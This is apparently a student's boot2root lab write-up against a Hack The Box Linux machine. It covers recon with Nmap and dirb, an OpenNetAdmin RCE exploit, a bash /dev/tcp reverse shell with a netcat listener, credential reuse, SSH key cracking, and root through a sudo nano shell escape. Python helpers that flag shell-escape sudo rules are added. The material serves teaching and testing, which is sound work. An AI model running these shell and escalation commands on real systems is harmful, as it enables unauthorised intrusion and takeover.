BIT354 Network Vulnerability Testing: Boot2root Challenge on Linux Based System Assessment Answer
In this assessment we conduct a boot2root challenge against a Linux machine on the Hack The Box platform. The attack is carried out over the network with tools such as Nmap, Netcat, dirb and a few Python scripts: first to find vulnerabilities in the target, then to gain a foothold on it, and finally to enumerate and read its contents.
The vulnerability and exploit:
A vulnerability is a weakness in a system or in software code, often introduced while the code is written or the system is configured. Such weaknesses are common in complex environments and are by no means absent from systems and servers regarded as secure. Many of them stem from default settings left in place, on servers, social media platforms, email accounts and so on. An attacker discovers vulnerabilities by various means, for example with sniffing or scanning tools, and uses them to attack the system. An exploit is the concrete way in: the code or technique that turns a vulnerability into access to the victim's system. Without a vulnerability there is no exploit. In this assessment the target exposes several open ports with services running behind them, and we use weaknesses in those services to exploit the system.
First, we use Nmap and dirb to collect information about the target. This phase is called reconnaissance (recon): we use tools and techniques to find the key facts about the target system. We start with Nmap to identify the open ports and the versions of the services behind them (-sV); -Pn skips host discovery, so the scan runs even if the host does not answer ping. Assuming the target IP is 192.168.30.4, the command is –
$ nmap -sV -Pn 192.168.30.4
From the result we obtain the open ports, the service versions and, where possible, details of the operating system, all of which can be used to find a way into the target. Next we fuzz the web server with the dirb tool to find directories that are accessible on it.
dirb reports several directories on this system, including test2 and artwork.
While browsing these directories we find, under the test2 folder, the login page of OpenNetAdmin (ONA). The login page discloses the application version, which we then research.
Next we download a Python exploit written for this version. Before using it, we run its check to confirm whether the discovered URL is actually vulnerable.
The check confirms that the URL is vulnerable to remote code execution (RCE). After a few attempts we successfully execute commands on the target through this vulnerability.
The output shows that we are connected to the target and running as a user named “user1” with uid 43, gid 43 and group 43.
To make further enumeration easier we use Netcat to obtain an interactive reverse shell from the Linux target. On the target we run the following command, where <IP> and <PORT> are the attacker's address and listening port –
$ /bin/bash -c 'bash -i >& /dev/tcp/<IP>/<PORT> 0>&1'
The result is as follows –
On the attacking machine, before running the command above, we start a Netcat listener so that the target has something to connect back to (Kili, 2020) –
$ nc -lvp 1234
The connection is established on this attempt and we land in the /opt/ona/www directory as user1.
We then enumerate the directories and files on this system with basic Linux commands such as ls, which gives the listing shown below.
We look into several of these directories for useful data.
In the directory listing above, the config directory contains a PHP script that looks interesting. On inspection it is the database configuration script of the application: it connects to a database on localhost, and the credentials for that database are stored in it in clear text, so they are now revealed to us. The listing and the script are shown below –
The PHP script therefore contains credentials that may also be reused for logging in elsewhere.
To see where these credentials might be reused, we look at the home directory of the system and find two user accounts.
We try to log in as these users over SSH with the password found in the script. The login is successful, and we can now list the files and directories of that user.
Here we find the file main.php under the /internal directory. According to its PHP code, this page prints the RSA private key (the SSH private key) of user User3.
To enumerate the target further we use the LinEnum.sh script (rebootuser/LinEnum, 2020), which, among other local checks, lists the ports that are open and in the listening state on the machine itself. Ports bound only to localhost never show up in the earlier Nmap scan, so this local check is the only way to find them. We download and run the script and find two listening ports on this system.
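The security-relevant point of this step is the gap between what Nmap saw from outside and what is actually listening on the box. The following added example (not part of the original write-up or of LinEnum) parses a constructed sample of `netstat -tlnp` output and separates loopback-only listeners from exposed ones, then compares the exposed set with the ports the remote scan reported; port 52846 is the one from this write-up, while the other ports and the Nmap result are assumed values used only to make the comparison visible.

```python
# Added example (not from the original write-up). Constructed sample of
# `netstat -tlnp` output: 52846 is the port found in the write-up; 3306, 22
# and 80 are assumed extra entries to illustrate the classification.
SAMPLE_NETSTAT = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:52846         0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
tcp6       0      0 ::1:52846               :::*                    LISTEN      -
"""

# Ports the earlier remote Nmap scan reported as open (assumed values).
NMAP_OPEN_PORTS = {22, 80}

LOOPBACK = {"127.0.0.1", "::1"}

def parse_listeners(netstat_text):
    """Return (proto, address, port) for every LISTEN line in netstat output.
    Both IPv4 (127.0.0.1:80) and IPv6 (:::80, ::1:80) forms are handled by
    splitting on the last colon only."""
    out = []
    for line in netstat_text.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[5] != "LISTEN":
            continue
        addr, port = fields[3].rsplit(":", 1)
        out.append((fields[0], addr, int(port)))
    return out

def classify_ports(listeners):
    """Split listening ports into those reachable from outside and those bound
    only to loopback. A port that listens on both counts as exposed."""
    exposed, loopback = set(), set()
    for _proto, addr, port in listeners:
        if addr in LOOPBACK:
            loopback.add(port)
        else:
            exposed.add(port)
    return exposed, loopback - exposed

def hidden_from_scan(netstat_text, nmap_ports):
    """Ports a remote scan could not have shown: loopback-only listeners, plus
    any exposed port the scan did not report (filtered or out of range)."""
    exposed, local_only = classify_ports(parse_listeners(netstat_text))
    return {
        "local_only": sorted(local_only),
        "exposed_not_scanned": sorted(exposed - set(nmap_ports)),
    }

if __name__ == "__main__":
    print(hidden_from_scan(SAMPLE_NETSTAT, NMAP_OPEN_PORTS))
```

Every port in `local_only` is a candidate for the kind of follow-up done next with curl from the target itself, since it can only be reached from inside the machine (or through a tunnel).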
Using curl from the target, we can check which of these local ports serves main.php.
The result of this command is as follows –
We successfully retrieve the SSH private key from port 52846. We save the key to a text file and try to crack its passphrase. To do this we first switch to the root account and run John the Ripper against the key (Chandel, 2020). The steps are –
From the above steps we successfully recover the passphrase of the SSH key. We then switch back from root to the User2 session and verify the passphrase by logging in over SSH to the key owner's account with that key.
The attempt is successful and we are logged into that account.
Implication of attack:
To do real damage to a business or system, an attacker needs full control of the target, so the final step of the attack is to escalate from an ordinary user to root (administrator) privileges. This is where the implication of the attack is greatest: with root, every file and setting on the machine, including system files and their entries, can be read or modified.
We look for commands that our current user is allowed to run with elevated privileges without supplying the root password. For this we run –
$ sudo -l
The output shows that our user may run the editor /bin/nano on the file /opt/priv as root without entering a password. nano can run an external command from inside the editor (Ctrl+R to read a file, then Ctrl+X to execute a command instead), so we open the file with sudo nano /opt/priv and use that command prompt to spawn a root shell with –
$ reset; sh 1>&0 2>&0
Running ‘whoami’ confirms that we now have a root shell and therefore full control of the system.
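The `sudo -l` step is a check worth automating on every foothold: any NOPASSWD rule whose binary can spawn a shell from inside itself is an immediate root shell. The following added example (not part of the original write-up) parses a constructed sample of `sudo -l` output and flags such rules against a short GTFOBins-style list of known escapes. The nano rule on /opt/priv reflects what this write-up found; the hostname "target" and the apt-get rule are assumed extras, added to show a rule that still prompts for a password.

```python
import os
import re

# Added example (not from the original write-up). Constructed `sudo -l` output:
# the nano line matches the write-up; the hostname and the apt-get rule are
# assumed extras.
SAMPLE_SUDO_L = """\
Matching Defaults entries for user2 on target:
    env_reset, mail_badpass

User user2 may run the following commands on target:
    (ALL) NOPASSWD: /bin/nano /opt/priv
    (root) /usr/bin/apt-get
"""

# Binaries with a documented way to run a shell from inside them. Kept short;
# the nano entry is the escape used in this write-up.
SHELL_ESCAPES = {
    "nano": "Ctrl+R then Ctrl+X, then run: reset; sh 1>&0 2>&0",
    "vim": ":!sh",
    "vi": ":!sh",
    "less": "!sh",
    "more": "!sh",
    "find": "find . -exec /bin/sh \\; -quit",
    "apt-get": "apt-get -o APT::Update::Pre-Invoke=/bin/sh update",
}

# `(runas) [TAG: TAG: ...] command, command`
RULE_RE = re.compile(r"^\s*\(([^)]+)\)\s*((?:[A-Z]+:\s*)*)(.+?)\s*$")

def parse_sudo_l(text):
    """Parse the rule lines of `sudo -l` into dicts of runas, flags and command.
    Only lines after 'may run the following commands' are considered."""
    rules = []
    in_rules = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules:
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, tags, cmds = m.groups()
        flags = {t.strip(": ") for t in tags.split(":") if t.strip(": ")}
        for cmd in cmds.split(", "):
            rules.append({"runas": runas, "flags": flags, "command": cmd.strip()})
    return rules

def find_escalations(text):
    """Flag rules whose binary has a known shell escape and record whether a
    password is needed. NOPASSWD plus an escape means a root shell right away;
    with a password required, the rule only helps if that password is known."""
    findings = []
    for rule in parse_sudo_l(text):
        binary = os.path.basename(rule["command"].split()[0])
        escape = SHELL_ESCAPES.get(binary)
        if escape is None:
            continue
        findings.append({
            "command": rule["command"],
            "runas": rule["runas"],
            "nopasswd": "NOPASSWD" in rule["flags"],
            "escape": escape,
        })
    return findings

if __name__ == "__main__":
    for f in find_escalations(SAMPLE_SUDO_L):
        tag = "NOPASSWD" if f["nopasswd"] else "password required"
        print(f"{f['command']} as {f['runas']} [{tag}]: {f['escape']}")
```

Even when the allowed argument is pinned to one file, as with /opt/priv here, the escape still works, because the restriction is on what nano opens, not on what nano can execute; the defensive fix is not to grant editors, pagers or similar interactive tools through sudo at all, or to use sudoedit instead.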
In this boot2root challenge we attacked a target system to find and exploit its vulnerabilities, using command-line tools such as nmap, dirb, netcat, the shell and Python scripts. We first searched for open ports and running services on the target, then used those services to gain access, moved between user accounts with reused and recovered credentials, and finally escalated to root through a misconfigured sudo rule. At the end of the task we have complete control of the system and can read every file and directory on it.